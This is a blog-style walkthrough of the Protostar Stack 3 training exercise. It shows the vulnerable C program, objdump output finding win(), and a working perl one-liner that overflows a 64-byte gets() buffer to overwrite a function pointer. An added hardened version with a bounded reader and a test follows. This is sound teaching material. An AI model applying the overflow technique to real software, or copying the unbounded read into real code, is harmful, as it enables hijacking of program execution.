MattAndreko.com

"hostess is a code-slaying dragon found deep within the core of the earth, unearthing magma and vulnerabilities single handedly while using the other hand to pet his cat"

Exploit Exercises - Protostar Stack 3


This challenge starts getting a little bit more involved than the previous ones. Instead of just providing a new value for the “modified” variable, we need to make the code jump to a method, changing the execution.

```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();   /* sits on the stack just above buffer */
  char buffer[64];

  fp = 0;

  gets(buffer);   /* unbounded read: more than 64 bytes of input runs into fp */

  if(fp) {
    printf("calling function pointer, jumping to 0x%08x\n", fp);
    fp();
  }
}
```

This means that, first of all, we need to find the address where the “win()” function is located in the program. To do this I used objdump, but gdb or any other disassembler would work just as well. I have cut the output down to the useful part below, since objdump prints a lot of information we don’t need.

```
user@protostar:/opt/protostar/bin$ objdump -d stack3
...

08048424 <win>:
 8048424:       55                      push   %ebp
 8048425:       89 e5                   mov    %esp,%ebp
 8048427:       83 ec 18                sub    $0x18,%esp
 804842a:       c7 04 24 40 85 04 08    movl   $0x8048540,(%esp)
 8048431:       e8 2a ff ff ff          call   8048360 <puts@plt>
 8048436:       c9                      leave
 8048437:       c3                      ret
...
```

From this we can see that the “win()” function is located at 0x08048424 in memory, so if we can get the program to jump there, it will execute that code. Conveniently, the “fp” pointer in the code gets called whenever it is not equal to 0, so we just need to overwrite it with the address of “win()”. Because “buffer” is 64 bytes long and “fp” sits directly above it on the stack, 64 bytes of padding followed by the address does the job; the address bytes are written least-significant byte first, since x86 is little-endian:

```
user@protostar:/opt/protostar/bin$ perl -e 'print "A"x64 . "\x24\x84\x04\x08"' | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
```
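For contrast, here is a hardened counterpart, added as an example and not part of the original post or the Protostar exercise: it keeps the same locals but replaces gets() with a bounded reader, and feeds the exact payload above (built in memory with the POSIX call fmemopen) through it to confirm that fp is never reached. The function names read_line_bounded, hardened_stack3 and fp_survives_payload are my own.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Bounded replacement for gets(): keeps at most n-1 bytes in dst,
 * strips the trailing newline and drains the rest of an over-long
 * line so the excess never lands on the stack. Returns the number
 * of bytes kept, or -1 on EOF/error before any input. */
int read_line_bounded(char *dst, size_t n, FILE *in)
{
    if (n == 0 || fgets(dst, (int)n, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';
    } else {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;   /* discard the remainder of the line */
    }
    return (int)len;
}

/* Hardened stack3 main(): same locals as the challenge, bounded read.
 * fp is kept as an integer and returned so the caller can confirm it
 * was not touched without ever calling through it. */
uintptr_t hardened_stack3(FILE *in)
{
    volatile uintptr_t fp = 0;   /* stands in for the function pointer */
    char buffer[64];
    read_line_bounded(buffer, sizeof buffer, in);
    return fp;
}

/* Feeds the post's payload (64 'A's then the little-endian address
 * 0x08048424, constructed here) through the hardened code; 1 if fp == 0. */
int fp_survives_payload(void)
{
    char payload[64 + 4 + 1];
    memset(payload, 'A', 64);
    memcpy(payload + 64, "\x24\x84\x04\x08", 4);
    payload[68] = '\n';
    FILE *in = fmemopen(payload, sizeof payload, "r");
    if (in == NULL) return 0;
    uintptr_t fp = hardened_stack3(in);
    fclose(in);
    return fp == 0;
}
```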
